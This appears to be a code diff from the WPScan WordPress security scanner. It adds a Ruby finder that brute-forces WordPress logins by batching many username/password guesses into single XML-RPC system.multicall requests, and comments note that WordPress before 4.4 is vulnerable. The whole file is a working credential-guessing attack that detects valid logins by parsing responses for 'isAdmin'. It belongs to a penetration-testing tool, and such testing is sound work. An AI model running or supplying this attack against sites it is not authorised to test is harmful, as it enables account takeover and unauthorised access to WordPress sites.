HELLO v3!!!

app/finders/passwords/xml_rpc_multicall.rb

@@ -0,0 +1,102 @@
+module WPScan
+  module Finders
+    module Passwords
+      # Password attack against the XMLRPC interface with the multicall method
+      # WP < 4.4 is vulnerable to such attack
+      class XMLRPCMulticall < CMSScanner::Finders::Finder
+        # @param [ Array<User> ] users
+        # @param [ Array<String> ] passwords
+        #
+        # @return [ Typhoeus::Response ]
+        def do_multi_call(users, passwords)
+          methods = []
+
+          users.each do |user|
+            passwords.each do |password|
+              methods << ['wp.getUsersBlogs', user.username, password]
+            end
+          end
+
+          target.multi_call(methods).run
+        end
+
+        # @param [ Array<CMSScanner::User> ] users
+        # @param [ Array<String> ] passwords
+        # @param [ Hash ] opts
+        # @option opts [ Boolean ] :show_progression
+        # @option opts [ Integer ] :multicall_max_passwords
+        #
+        # @yield [ CMSScanner::User ] When a valid combination is found
+        #
+        # TODO: Make rubocop happy about metrics etc
+        #
+        # rubocop:disable all
+        def attack(users, passwords, opts = {})
+          wordlist_index         = 0
+          max_passwords          = opts[:multicall_max_passwords]
+          current_passwords_size = passwords_size(max_passwords, users.size)
+
+          create_progress_bar(total: (passwords.size / current_passwords_size.round(1)).ceil,
+                              show_progression: opts[:show_progression])
+
+          loop do
+            current_users     = users.select { |user| user.password.nil? }
+            current_passwords = passwords[wordlist_index, current_passwords_size]
+            wordlist_index   += current_passwords_size
+
+            break if current_users.empty? || current_passwords.nil? || current_passwords.empty?
+
+            res = do_multi_call(current_users, current_passwords)
+
+            progress_bar.increment
+
+            check_and_output_errors(res)
+
+            # Avoid to parse the response and iterate over all the structs in the document
+            # if there isn't any tag matching a valid combination
+            next unless res.body =~ /isAdmin/ # maybe a better one ?
+
+            Nokogiri::XML(res.body).xpath('//struct').each_with_index do |struct, index|
+              next if struct.text =~ /faultCode/
+
+              user = current_users[index / current_passwords.size]
+              user.password = current_passwords[index % current_passwords.size]
+
+              yield user
+
+              # Updates the current_passwords_size and progress_bar#total
+              # given that less requests will be done due to a valid combination found.
+              current_passwords_size = passwords_size(max_passwords, current_users.size - 1)
+
+              if current_passwords_size == 0
+                progress_bar.log('All Found') # remove ?
+                progress_bar.stop
+                break
+              end
+
+              progress_bar.total = progress_bar.progress + ((passwords.size - wordlist_index) / current_passwords_size.round(1)).ceil
+            end
+          end
+          # Maybe a progress_bar.stop ?
+        end
+        # rubocop:disable all
+
+        def passwords_size(max_passwords, users_size)
+          return 1 if max_passwords < users_size
+          return 0 if users_size == 0
+
+          max_passwords / users_size
+        end
+
+        # @param [ Typhoeus::Response ] res
+        def check_and_output_errors(res)
+          progress_bar.log("Incorrect response: #{res.code} / #{res.return_message}") unless res.code == 200
+
+          progress_bar.log('Parsing error, might be caused by a too high --max-passwords value (such as >= 2k)') if res.body =~ /parse error. not well formed/i
+
+          progress_bar.log('The requested method is not supported') if res.body =~ /requested method [^ ]+ does not exist/i
+        end
+      end
+    end
+  end
+end